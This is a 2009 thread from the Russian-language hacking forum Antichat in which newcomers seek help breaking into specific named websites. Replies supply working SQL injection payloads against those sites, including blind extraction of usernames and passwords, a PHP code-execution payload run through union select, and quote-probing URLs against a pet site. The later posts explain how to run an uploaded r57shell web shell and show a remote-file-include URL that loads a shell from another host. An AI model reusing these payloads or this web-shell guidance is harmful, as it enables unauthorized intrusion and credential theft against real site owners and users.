ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2009, 10:51
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
Не кидайте сильно в меня какашками так как я новичек ) подскажите что можно к примеру здесь сделать
http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or +password=1
Error running query : select level,password from users where username = 'user' or password=1' and enabled=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and enabled=1' at line 1
только надо заменить на password='1' вроде чет показывает но все равно ниче интересного  |
|
|
06.05.2009, 11:08
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
....g=eng&langid=&username=user'+or+password=1
нужно просто отрезать лишнее
_http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or +password=1/*
|
|
|
|
06.05.2009, 11:14
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
You do not have access to this resource
все равно донт акссес
заодно если не тяжело посмотрите плиз вот
http://catlog.org.ua/tem.php?g=28&count=25'
я все унионы перепробовал до 34-го, чет никакого результата.
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/chat/public_html/pro/tem.php on line 38
|
|
|
|
06.05.2009, 14:04
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от udman
все равно донт акссес
Мор1ров заюзай
http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+an d+if(ascii(substring((select+concat_ws(0x2F,userna me,password)+from+users+limit+0,1),1,1))>1,1,(sele ct+1+union+select+2))=1--+
А доступа нет возможно потому что ты не авторизирован. Попробуй зарегиться
|
|
|
|
06.05.2009, 14:56
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от cr0w
-m0rgan-
Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5
?
Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls
Не, ну это я знаю...
Я видел такую фиговину, с названием RFI SQL INJ которая выглядила как то так:
http://www.centralpets.com/php/search/storiesdisplay.php?Story='83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=\'83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%00'83
http://www.centralpets.com/php/search/storiesdisplay.php?Story="83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%3D83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%252783
http://www.centralpets.com/php/search/storiesdisplay.php?Story='"83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=\"83
http://www.centralpets.com/php/search/storiesdisplay.php?Story="+and+1=0+--+83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=)83
|
|
|
|
06.05.2009, 15:02
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
-m0rgan-, всё что видно по твоему логу, это попытка подобрать то какой вид кавычки нужен, нужна ли закрывающая скобка или не нужна вообще. (Да и то както криво с учётом того, где находится число 83)
З.Ы.
К RFI отношения не имеет.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 06.05.2009 в 15:06..
|
|
|
|
06.05.2009, 15:06
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Ясн, просто наткнулся на на эту фигню и ей кто то присвоил название RFI скуль нижект...
|
|
|
|
06.05.2009, 15:20
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
подскажите новичку залил шель r57shell 1.3 как теперь его запустить и еще что означает иньекция и инклуд
|
|
|
|
06.05.2009, 15:32
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Чтобы запустить шелл, проследуй в ту директорию, в которую ты его залил, например ты заливаешь его в папку tmp, то гуляй по адресу www.site.com/tmp/shell.php.
SQL-Injection – внедрение произвольного SQL-кода в исполняемый запрос
PHP-include – возможность включения произвольного PHP-кода в исполняемый поток на стороне сервера.
|
|
|
|
06.05.2009, 16:10
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
здесь прочитал что шель можно залить и так http://wow.alania.net/?page=http://site.ru/shell.php если да то как его запустить если можете какую шель посаветуете если можно еще сылку на шели
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
